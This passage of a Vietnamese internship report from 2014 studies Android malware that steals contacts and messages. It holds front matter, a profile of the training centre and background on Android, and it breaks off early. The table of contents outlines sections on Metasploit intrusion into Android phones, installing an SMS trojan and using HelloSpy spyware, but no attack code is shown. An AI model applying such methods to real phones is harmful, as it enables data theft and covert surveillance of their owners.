SlideShare a Scribd company logo
1 of 88
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 1
BỘ GIÁO DỤC VÀ ĐÀO TẠO
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN
KHOA ĐIỆN TỬ - VIỄN THÔNG
BÁO CÁO ĐỀ TÀI THỰC TẬP
ĐỀ TÀI:
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO
PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ
DỤNG ANDROID VÀ GỬI RA NGOÀI
 Nơi thực tập :
TT.QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA
 Thời gian :
7/7/2014 – 7/9/2014
GVHD : VÕ ĐỖ THẮNG
SVTT : NGUYỄN TUẤN KIỆT
MSSV : 1120084
TP.HCM, THÁNG 8 NĂM 2014
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 2
LỜI CAM ĐOAN
Em xin cam đoan:
 Những nội dung trong báo cáo này là do em thực hiện dưới sự hướng dẫn trực tiếp của thầy
Võ Đỗ Thắng.
 Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, tên công
trình, thời gian, địa điểm công bố.
 Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu hoàn toàn
trách nhiệm.
TPHCM, ngày 16 tháng 08 năm 2014
Sinh viên thực tập
Nguyễn Tuấn Kiệt
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 3
LỜI CẢM ƠN
KHOA ĐIỆN TỬ VIỄN THÔNG
Em xin chân thành cảm ơn trường đại học Khoa học tự nhiên và khoa Điện tử viễn
thông đã chỉ dạy những kiến thức nền quý báu, tạo điều kiện cho em hoàn thành tốt đợt thực
tập này. Đợt thực tập này đã giúp cho em đúc kết được rất nhiều kinh nghiệm cho bản thân.
Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc
sau này.
Trong đợt thực tập này, em đã nỗ lực hết mình để có thể đạt được kết quả tốt nhất.
Nhưng, bên cạnh đó chắc chắn em không thể tránh khỏi những thiếu sót nhất định. Em rất
mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa trong tương lai.
Một lần nữa em xin chân thành cảm ơn.
TPHCM, ngày 16 tháng 08 năm 2014
Sinh viên thực tập
Nguyễn Tuấn Kiệt
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 4
LỜI CẢM ƠN
TRUNG TÂM ATHENA
Em xin cảm ơn Trung tâm đào tạo Quản trị mạng và An ninh mạng quốc tế Athena,
cùng các anh chị trong công ty. Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ Thắng đã
nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo
mọi điều kiện thuận lợi, cung cấp những kiến thức cần thiết cũng như đóng góp những ý
kiến quý báu để em hoàn thành tốt bài báo cáo này.
Một lần nữa em xin chân thành cảm ơn.
TPHCM, ngày 16 tháng 08 năm 2014
Sinh viên thực tập
Nguyễn Tuấn Kiệt
Thầy Võ Đỗ Thắng (bên trái) cùng SVTT Nguyễn Tuấn Kiệt (bên phải)
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 5
NHẬN XÉT CỦA KHOA
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Chủ nhiệm khoa
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 6
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giáo viên hướng dẫn
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 7
LỜI GIỚI THIỆU
Số lượng các báo cáo về nguy cơ an ninh trên các thiết bị di động Android từ các công ty
nghiên cứu bảo mật gia tăng cho thấy hệ điều hành này đang là đích nhắm cho tin tặc cùng
các phần mềm độc hại.
Không quá khó khăn và cũng không cần thiết phải có những nghiên cứu chi tiết để nhận ra
rằng hệ điều hành Android đang bị tấn công nhiều hơn. Chỉ cần nhìn vào trường hợp
facebook, khi mạng xã hội này trở nên nổi tiếng và có số lượng người dùng đông đảo, lập
tức nó trở thành đích ngắm của các tin tặc. Giới tội phạm mạng luôn tìm mọi cách để lợi
dụng các lỗ hổng bảo mật của những hệ điều hành được cài đặt trên số đông thiết bị. Và
điểm yếu cố hữu trong an ninh bảo mật vẫn nằm ở người dùng rồi mới đến thiết bị. Các nhà
nghiên cứu bảo mật cho biết hiện có quá nhiều người dùng Android bất cẩn luôn tải về ứng
dụng mà không thèm kiểm tra tìm hiểu trước xem chúng có an toàn hay không.
Vậy để biết thêm phần nào về cách thức mà các tin tặc tấn công các thiết bị Android đồng
thời để hạn chế được điều này, em xin mời thầy và các bạn cùng đi đến bài báo cáo của em.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 8
Mục lục
PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP ............................................................................... 11
1. Giới thiệu về Trung tâm Athena............................................................................................. 11
2. Trụ sở và các chi nhánh .......................................................................................................... 11
3. Quá trình hình thành và phát triển .......................................................................................... 12
3.1. Quá trình hình thành ........................................................................................................ 12
3.2. Quá trình phát triển.......................................................................................................... 13
3.3. Cơ cấu tổ chức ................................................................................................................. 14
4. Tình hình hoạt động trong năm 2011...................................................................................... 15
4.1. Cơ cấu sản phẩm.............................................................................................................. 15
4.1.1. Các khóa học dài hạn................................................................................................ 15
4.1.2. Các khóa học ngắn hạn............................................................................................. 15
4.1.2.1. Khóa Quản trị mạng.............................................................................................. 15
4.1.2.2. Khóa thiết kế web và bảo mật mạng..................................................................... 15
4.1.2.3. Các sản phẩm khác................................................................................................. 15
5. Chiến lược Marketing của Trung tâm Athena ........................................................................ 16
5.1. Chiến lược sản phẩm ....................................................................................................... 16
5.2. Chiến lược tập hợp sản phẩm: ......................................................................................... 16
5.3. Chiến lược dòng sản phẩm: ............................................................................................. 17
PHẦN 2: BÁO CÁO ĐỀ TÀI........................................................................................................ 18
1. Giới thiệu về Android ............................................................................................................. 18
1.1. Android là gì? .................................................................................................................. 18
1.2. Lịch sử phát triển Anroid................................................................................................. 18
1.3. Đặt điểm của Android...................................................................................................... 19
1.3.1. Tính mở .................................................................................................................... 19
1.3.2. Tính ngang bằng của các ứng dụng.......................................................................... 19
1.3.3. Phá vỡ rào cản phát triển ứng dụng.......................................................................... 19
1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng .......................................................... 19
1.4. Các phiên bản của android............................................................................................... 20
1.5. Tỷ lệ sử dụng các phiên bản android............................................................................... 22
1.6. So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich):........... 22
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt............................................. 23
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 9
1.6.2. Sự khác nhau về giao diện......................................................................................... 23
1.6.3. Sự khác nhau về tính năng......................................................................................... 25
1.6.4. Sự khác nhau về giao thức mạng................................................................................ 25
2. Nghiên cứu về mã độc trong mỗi trường android................................................................... 26
2.1. Malware là gì? ................................................................................................................. 26
2.2. Phân loại .......................................................................................................................... 27
2.3. Cơ chế hoạt động của Malware ....................................................................................... 27
2.4. Mục đích của Malware DroidDream ............................................................................... 28
2.5. Dấu hiệu bị nhiễm các phần mềm độc hại....................................................................... 28
3. Xâm nhập android qua mạng local ......................................................................................... 29
3.1. Giới thiệu về Kali Linux.................................................................................................. 29
3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian................................................... 29
3.1.2. Hỗ trợ mạng không dây tốt hơn................................................................................ 29
3.1.3. Khả năng tùy biến cao.............................................................................................. 29
3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai ..................................... 30
3.2. Cài đặt Kali Linux........................................................................................................ 30
3.3. Metasploit framework trong Kali linux........................................................................... 40
3.3.1. Giới thiệu.................................................................................................................. 40
3.3.2. Sử dụng metasploit framework ................................................................................ 40
3.4. Tấn công android dùng Metasploit Framework trong Kali Linux................................... 42
4. Thực hiện xâm nhập android thông qua mạng Internet .......................................................... 49
4.1. Giới thiệu về VPS............................................................................................................ 49
4.1.1. VPS là gì?................................................................................................................. 49
4.1.2. Đặc điểm về thông số VPS....................................................................................... 50
4.1.3. Giá trị khi sử dụng VPS ........................................................................................... 50
4.2. Cài đặt metasploit ............................................................................................................ 51
4.3. Xâm nhập vào thiết bị android......................................................................................... 57
5. Cài đặt SMS Trojan dùng iCalender....................................................................................... 67
5.1. Cài đặt máy ảo android AVD Manager.............................................................................. 67
5.1.1. Cài đặt JDK:............................................................................................................. 67
5.1.2. Cài đặt android SDK ................................................................................................ 68
5.1.3. Cài đặt máy ảo android ................................................................................................ 69
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 10
5.2. Cài SMS Trojan vào máy android ảo................................................................................. 71
5.2.1. Các công cụ cần thiết ................................................................................................. 71
5.2.2. Các bước thực hiện................................................................................................... 72
6. Tìm hiểu về HelloSpy để theo dõi thiết bị android................................................................. 79
6.1. HelloSpy là gì? ................................................................................................................ 79
6.2. Tính năng của HelloSpy .................................................................................................. 79
6.2.1. Truy cập từ xa:.......................................................................................................... 79
6.2.2. Theo dõi các tin nhắn WhatsApp (không có rễ):...................................................... 79
6.2.3. Theo dõi lịch sử Internet: ......................................................................................... 79
6.2.4. Spy cuộc gọi ghi âm:................................................................................................ 79
6.2.5. Theo dõi tất cả bắt hình ảnh: .................................................................................... 79
6.2.6. Kiểm soát các ứng dụng và chương trình:................................................................ 79
6.2.7. Theo dõi tin nhắn SMS:............................................................................................ 80
6.2.8. Theo dõi Viber, facebook và yahoo thông điệp: ...................................................... 80
6.2.9. GPS Tracking: .......................................................................................................... 80
6.2.10. Lịch sử màn hình cuộc gọi: ...................................................................................... 80
6.3. Cài đặt HelloSpy.............................................................................................................. 80
7. Tổng kết .................................................................................................................................. 85
8. Kinh nghiệm đạt được sau đợt thực tập .................................................................................. 86
9. Các link báo báo...................................................................................................................... 87
10. Các link tham khảo.................................................................................................................. 88
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 11
PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP
1. Giới thiệu về Trung tâm Athena
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công
ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM
ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của
Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh
nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến
trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:
- Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính,
internet, bảo mật và thương mại điện tử….
- Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh
doanh.
- Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về
mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu
cầu.
- Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu
thông tin về các ứng dụng và sự cố mạng.
- Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố
máy tính.
2. Trụ sở và các chi nhánh
- Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.athena.com.vn
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 12
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
- Cơ sở 2_Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88
- Chi nhánh Nha Trang
+ Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692
+ Website: www.athena.edu.vn
+ Email : training@athenavn.com
3. Quá trình hình thành và phát triển
3.1.Quá trình hình thành
Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin
nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm
nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực
lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh
nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công
nghệ thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám
đốc dự án của công ty Siemen Telecom.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 13
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công
ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ
thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành
viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.
3.2.Quá trình phát triển
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành
một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và
đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project
2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh
viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội
ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất
nước nói chung, các doanh nghiệp, cá nhân nói riêng.
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh
tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia
an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc,
đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực
công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của
trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với
khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn
Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ
hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu
quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác.
Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến
trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 14
đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm.
Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép
đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng
hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo
quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung
tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với
sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp
nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến
trình tin học hóa nước nhà.
3.3.Cơ cấu tổ chức
Sơ đồ tổ chức công ty
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 15
4. Tình hình hoạt động trong năm 2011
4.1.Cơ cấu sản phẩm
4.1.1. Các khóa học dài hạn
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.
4.1.2. Các khóa học ngắn hạn
4.1.2.1.Khóa Quản trị mạng
- Quản trị mạng Microsoft căn bản ACBN
- Phần cứng máy tính, laptop, server
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE
- Quản trị window Vista
- Quản trị hệ thống Window Server 2003:2008
- Lớp Master Exchange Mail Server
- Quản trị mạng quốc tế Cissco CCNA
- Quản trị hệ thống mạng Linux 1 và Linux 2.
4.1.2.2.Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
- Lập trình web với Php và MySQL
- Bảo mật mạng quốc tế ACNS
- Hacker mũ trắng
- Athena Mastering Firewall Security
- Bảo mật website.
4.1.2.3. Các sản phẩm khác.
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 16
- Chuyên đề thực hành bảo mật mạng Wi_Fi
- Chuyên đề Ghost qua mạng
- Chuyên đề xây dựng và quản trị diễn đàn
- Chuyên đề bảo mật dữ liệu phòng chống nội gián
- Chuyên đề quản lý tài sản công nghệ thông tin
- Chuyên đề kỹ năng thương mại điện tử.
5. Chiến lược Marketing của Trung tâm Athena
5.1. Chiến lược sản phẩm
Chiến lược sản phẩm là sự cố kết gắn bó của sự lựa chọn và của những biện pháp phải sử dụng
để xác định một tập hợp sản phẩm bao gồm các dòng sản phẩm và các món hàng sao cho phù hợp
nhất với thị trường mục tiêu và từng giai đoạn khác nhau trong chu kì sản phẩm.
Chiến lược sản phẩm đóng vai trò cực kì quan trọng trong hoạt động Marketing, nó là công cụ
cạnh tranh bền vững của doanh nghiệp. Thực hiện tốt chiến lược về sản phẩm thì các chiến lược
giá, phân phối, xúc tiến mới được triển khai và phối hợp một cách hiệu quả nhất. Không chỉ thế,
chiến lược sản phẩm còn là một trong những yếu tố giúp doanh nghiệp thực hiện tốt mục tiêu
marketing trong từng thời kì.
Với phương châm “ Uy tín, chất lượng đào tạo và sự hài lòng của khách hàng” lên hàng đầu.
Trung tâm Đào tạo Quản trị và An ninh mạng Athena luôn nổ lực tập trung vào nâng cao chất lượng
giáo dục, tuyển dụng đội ngũ giảng viên có trình độ chuyên môn và kinh nghiệm cao, đội ngũ tư
vấn viên giúp học viên có thể lựa chọn những chương trình phù hợp và Bộ phận chuyên trách về
cập nhật thông tin cũng như làm mới giáo án nhằm đảm bảo chất lượng đào tạo tốt nhất cho từng
học viên khi đến với trung tâm.
Chính vì xác định được tầm quan trọng của chiến lược sản phẩm, Trung tâm Đào tạo Quản trị
và An ninh mạng Athena đã đưa ra các chiến lược sản phẩm như sau:
5.2. Chiến lược tập hợp sản phẩm:
Athena tập trung vào chiến lược mở rộng tập hợp sản phẩm. Có nghĩa là Athena tăng thêm các
dòng sản phẩm mới thích hợp với từng thời kì cụ thể theo yêu cầu của khách hàng, cụ thể theo từng
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 17
giai đoạn phát triển của doanh nghiệp cũng như yêu cầu của xã hội về lĩnh vực công nghệ thông
tin.
Vào những ngày đầu thành lập với tư cách là một nhóm nhỏ bao gồm các thành viên yêu thích
lĩnh vực công nghệ thông tin và hổ trợ các doanh nghiệp với chương trình “ ứng cứu máy tinh”.
Athena tập trung vào lĩnh vực đào tạo chuyên gia an ninh mạng AN2S và chương trình cảnh sát
máy tính nhằm giúp các doanh nghiệp xử lý các vấn đề về máy tính và mạng máy tính. Đào tạo và
cung cấp cho xã hội lực lượng nguồn lao động trong lĩnh vực bảo vệ máy tính và mạng máy tính.
Trong quá trình phát triển, internet trở thành một công cụ hữu hiệu và là phương tiện kinh
doanh của hầu hết các tổ chức, doanh nghiệp, cá nhân. Để đáp ứng được nhu cầu ngày càng tăng
cao về nguồn nhân lực trong lĩnh vực mạng internet, Athena tăng thêm các khóa học về mạng máy
tính, chuyên gia online marketing hay các khóa học về E_marketing.
Ngày nay, với sự phát triển mạnh mẽ của ngành công nghệ thông tin, ngày càng nhiều doanh
nghiệp đòi hỏi các chứng chỉ quốc tế trong lĩnh vực này. Nắm bắt được xu thế mới của thời đại,
Trung tâm Đào tạo Quản trị và An ninh mạng Athena đã mở rộng chương trình đào tạo, tổ chức
thêm các khóa học đạt chứng chỉ quốc tế như MCSA, Quản trị mạng Cissco….
5.3. Chiến lược dòng sản phẩm:
Để có thể phân bổ rủi ro cũng như nâng cao được mức lợi nhuận cho doanh nghiệp. Trung tâm
Đào tạo Quản trị và An ninh mạng Athena tập trung vào chiến lược phát triển dòng sản phẩm bằng
cách tập trung đầu tư vào những dòng sản phẩm chủ lực của doanh nghiệp để tối đa hóa lợi nhuận,
đồng thời phát triển thêm các dòng sản phẩm mới như các khóa chuyên đề nhằm hổ trợ tạo sự đa
dạng của các dòng sản phẩm, đáp ứng được nhu cầu của xã hội, cố gắng dẫn đầu thị trường và lắp
kín các lỗ hổng để ngăn ngừa đối thủ cạnh tranh. Trong đó khóa học chủ lực của doanh nghiệp là
các khóa học lấy các chứng chỉ quốc tế như: MCSE, Quản trị mạng Cissco, Bảo mật web
Security+…
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 18
PHẦN 2: BÁO CÁO ĐỀ TÀI
1. Giới thiệu về Android
1.1.Android là gì?
Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành cho các thiết bị di động
có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Android ra mắt vào năm 2007
cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần
cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động.
Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008.
Android có mã nguồn mở và Google phát hành mã nguồn theo Giấy phép Apache. Chính mã nguồn
mở cùng với một giấy phép không có nhiều ràng buộc đã cho phép các nhà phát triển thiết bị, mạng
di động và các lập trình viên nhiệt huyết được điều chỉnh và phân phối Android một cách tự do.
Ngoài ra, Android còn có một cộng đồng lập trình viên đông đảo chuyên viết các ứng dụng để mở
rộng chức năng của thiết bị, bằng một loại ngôn ngữ lập trình Java có sửa đổi. Vào tháng 10 năm
2012, có khoảng 700.000 ứng dụng trên Android, và số lượt tải ứng dụng từ Google Play, cửa hàng
ứng dụng chính của Android, ước tính khoảng 25 tỷ lượt.
Những yếu tố này đã giúp Android trở thành nền tảng điện thoại thông minh phổ biến nhất thế giới,
vượt qua Symbian vào quý 4 năm 2010, và được các công ty công nghệ lựa chọn khi họ cần một hệ
điều hành không nặng nề, có khả năng tinh chỉnh, và giá rẻ chạy trên các thiết bị công nghệ cao
thay vì tạo dựng từ đầu. Kết quả là mặc dù được thiết kế để chạy trên điện thoại và máy tính bảng,
Android đã xuất hiện trên TV, máy chơi game và các thiết bị điện tử khác. Bản chất mở của Android
cũng khích lệ một đội ngũ đông đảo lập trình viên và những người đam mê sử dụng mã nguồn mở
để tạo ra những dự án do cộng đồng quản lý. Những dự án này bổ sung các tính năng cao cấp cho
những người dùng thích tìm tòi hoặc đưa Android vào các thiết bị ban đầu chạy hệ điều hành khác.
Android chiếm 75% thị phần điện thoại thông minh trên toàn thế giới vào thời điểm quý 3 năm
2012, với tổng cộng 500 triệu thiết bị đã được kích hoạt và 1,3 triệu lượt kích hoạt mỗi ngày. Sự
thành công của hệ điều hành cũng khiến nó trở thành mục tiêu trong các vụ kiện liên quan đến bằng
phát minh, góp mặt trong cái gọi là "cuộc chiến điện thoại thông minh" giữa các công ty công nghệ.
1.2.Lịch sử phát triển Anroid
Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập có trụ sở ở Palo
Alto, California, Mỹ. Những nhà đồng sáng lập của Android chuyển sang làm việc tại Google gồm
có Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập công ty Wildfire
Communications), Nick Sears (từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm
thiết kế và phát triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của Android,
ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều này tạo những tin đồn về
việc Google có ý định bước vào thị trường điện thoại di động.
Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động dựa trên hạt nhân
Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và các nhà mạng trên những tiền đề
về việc cung cấp một hệ thống mềm dẻo, có khả năng nâng cấp mở rộng cao.[cần dẫn nguồn] Một
số nguồn tin cho biết trước đó Google đã lên danh sách các thành phần phần cứng và các đối tác
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 19
phần mềm, đồng thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp độ khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong
tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công
nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực
hiện điều này. Các phương tiện truyền thông in và online cũng sớm có bài viết về những tin đồn
cho rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Và lại càng có
nhiều suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả công nghệ và trình diễn các
mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng.
1.3.Đặt điểm của Android
1.3.1. Tính mở
Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn
với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng
có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng
máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng.
Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu
hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được
